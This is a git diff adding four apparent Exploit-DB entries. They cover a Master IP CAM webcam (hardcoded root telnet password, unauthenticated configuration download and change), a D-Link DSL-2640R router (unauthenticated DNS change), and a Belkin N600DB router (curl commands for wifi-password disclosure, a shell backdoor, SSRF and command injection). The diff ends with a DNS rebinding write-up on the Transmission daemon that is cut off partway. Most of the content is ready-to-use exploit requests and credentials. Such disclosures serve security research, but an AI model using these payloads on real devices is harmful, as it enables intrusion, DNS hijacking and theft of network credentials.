diff --git a/exploits/hardware/remote/43693.txt b/exploits/hardware/remote/43693.txt
new file mode 100644
index 000000000..5a0556283
--- /dev/null
+++ b/exploits/hardware/remote/43693.txt
@@ -0,0 +1,68 @@
+# Exploit Title: Master IP CAM 01 Multiple Vulnerabilities
+# Date: 17-01-2018
+# Remote: Yes
+# Exploit Authors: Daniele Linguaglossa, Raffaele Sabato
+# Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89
+# Vendor: Master IP CAM
+# Version: 3.3.4.2103
+# CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726
+
+I DESCRIPTION
+========================================================================
+The Master IP CAM 01 suffers of multiple vulnerabilities:
+
+# [CVE-2018-5723] Hardcoded Password for Root Account
+# [CVE-2018-5724] Unauthenticated Configuration Download and Upload
+# [CVE-2018-5725] Unauthenticated Configuration Change
+# [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
+
+
+II PROOF OF CONCEPT
+========================================================================
+
+## [CVE-2018-5723] Hardcoded Password for Root Account
+
+Is possible to access telnet with the hardcoded credential root:cat1029
+
+
+## [CVE-2018-5724] Unauthenticated Configuration Download and Upload
+
+Download:
+
+http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi
+
+Upload Form:
+
+### Unauthenticated Configuration Upload
+
+
+
+## [CVE-2018-5725] Unauthenticated Configuration Change
+
+Change configuration:
+
+http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080
+
+List of available commands here:
+http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
+
+
+## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
+
+Retrieve sensitive information:
+
+http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser
+
+
+III REFERENCES
+========================================================================
+http://syrion.me/blog/master-ipcam/
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726
+http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
\ No newline at end of file
diff --git a/exploits/hardware/webapps/43678.txt b/exploits/hardware/webapps/43678.txt
new file mode 100644
index 000000000..e06851587
--- /dev/null
+++ b/exploits/hardware/webapps/43678.txt
@@ -0,0 +1,54 @@
+#
+#
+# D-Link DSL-2640R Unauthenticated Remote DNS Change Vulnerability
+#
+# Firmware Version: UK_1.06 Hardware Version: B1
+#
+# Copyright 2018 (c) Todor Donev
+#
+# https://ethical-hacker.org/
+# https://facebook.com/ethicalhackerorg/
+#
+# Description:
+# The vulnerability exist in the web interface.
+# D-Link's various routers are susceptible to unauthorized DNS change.
+# The problem is when entering an invalid / wrong user and password.
+#
+# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
+# DEVICES MAY AFFECTED.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+#
+
+Proof of Concept:
+
+http:///Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=&dnsSecondary=
\ No newline at end of file
diff --git a/exploits/hardware/webapps/43682.txt b/exploits/hardware/webapps/43682.txt
new file mode 100644
index 000000000..d552c4615
--- /dev/null
+++ b/exploits/hardware/webapps/43682.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Belkin N600DB Wireless Router | Multiple Vulnerabilities
+# Date: 16/01/2018
+# Exploit Author: Wadeek
+# Hardware Version: F9K1102as v3
+# Firmware Version: 3.04.11
+# Vendor Homepage: http://www.belkin.com/fr/support/product/?pid=F9K1102as
+# Firmware Link: http://cache-www.belkin.com/support/dl/F9K1102_WW_3.04.11.bin
+
+== Wireless Fingerprinting ==
+#===========================================
+:ESSID: "belkin.XXX"
+:Mode: Master
+:Encryption key WPA2 Version 1 CCMP PSK: on
+:Wireless Password/PIN: 8-alphanumeric
+:DHCP: enable (192.168.2.1)
+:MAC Address: 58:EF:68
+#===========================================
+
+== Web Fingerprinting (With Locked Web Interface) ==
+#===========================================
+:www.shodan.io: "Server: httpd" "Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0" "100-index.htm"
+#===========================================
+:Device images:
+/images/troubleshooting/checkWires.png (600x270)
+/images/troubleshooting/startModem.png (600x270)
+/images/troubleshooting/stopModem.png (600x270)
+/images/troubleshooting/restartRouter.png (600x270)
+#===========================================
+:Hardware version,Firmware version,Serial number,...: /cgi/cgi_st.js && /cgi/cgi_dashboard.js
+#===========================================
+
+== PoC ==
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+:Disclore wifi password:
+curl --silent "http://192.168.2.1/langchg.cgi"
+||
+curl --silent "http://192.168.2.1/adv_wifidef.cgi"
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+:Closed "HTTPD server" port:
+curl --silent "http://192.168.2.1/removepwd.cgi" --data ""
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+:Web Backdoor:
+http://192.168.2.1/dev.htm
+> ?
+> sh
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+:Server-Side Request Forgery (HTTP/FTP):
+{45.33.32.156 == scanme.nmap.org}
+curl --silent "http://192.168.2.1/proxy.cgi?chk&url=http://45.33.32.156/"
+||
+curl --silent "http://192.168.2.1/proxy.cgi?chk&url=ftp://45.33.32.156/"
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+:Command Injection:
+curl --silent "http://192.168.2.1/proxy.cgi?chk&url=--help"
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
\ No newline at end of file
diff --git a/exploits/multiple/remote/43665.md b/exploits/multiple/remote/43665.md
new file mode 100644
index 000000000..10cb4d582
--- /dev/null
+++ b/exploits/multiple/remote/43665.md
@@ -0,0 +1,65 @@
+The transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc.
+
+Clients interact with the daemon using JSON RPC requests to a web server listening on port 9091. By default, the daemon will only accept requests from localhost.
+
+A sample RPC session looks like this:
+
+```
+$ curl -H 'X-Transmission-Session-Id: foo' -sI '{}' http://localhost:9091/transmission/rpc
+HTTP/1.1 409 Conflict
+Server: Transmission
+X-Transmission-Session-Id: JL641xTn2h53UsN6bVa0kJjRBLA6oX1Ayl06AJwuhHvSgE6H
+Date: Wed, 29 Nov 2017 21:37:41 GMT
+```
+
+```
+$ curl -H 'X-Transmission-Session-Id: JL641xTn2h53UsN6bVa0kJjRBLA6oX1Ayl06AJwuhHvSgE6H' -d '{"method":"session-set","arguments":{"download-dir":"/home/user"}}' -si http://localhost:9091/transmission/rpc
+HTTP/1.1 200 OK
+Server: Transmission
+Content-Type: application/json; charset=UTF-8
+Date: Wed, 29 Nov 2017 21:38:57 GMT
+Content-Length: 36
+
+{"arguments":{},"result":"success"}
+```
+
+As with all HTTP RPC schemes like this, any website can send requests to the daemon with XMLHttpRequest, but the theory is they will be ignored because requests must read and request a specific header, X-Transmission-Session-Id. Unfortunately, this design doesn't work because of an attack called "dns rebinding". Any website can simply create a dns name that they are authorized to communicate with, and then make it resolve to localhost.
+
+The attack works like this:
+
+1. A user visits http://attacker.com.
+2. attacker.com has an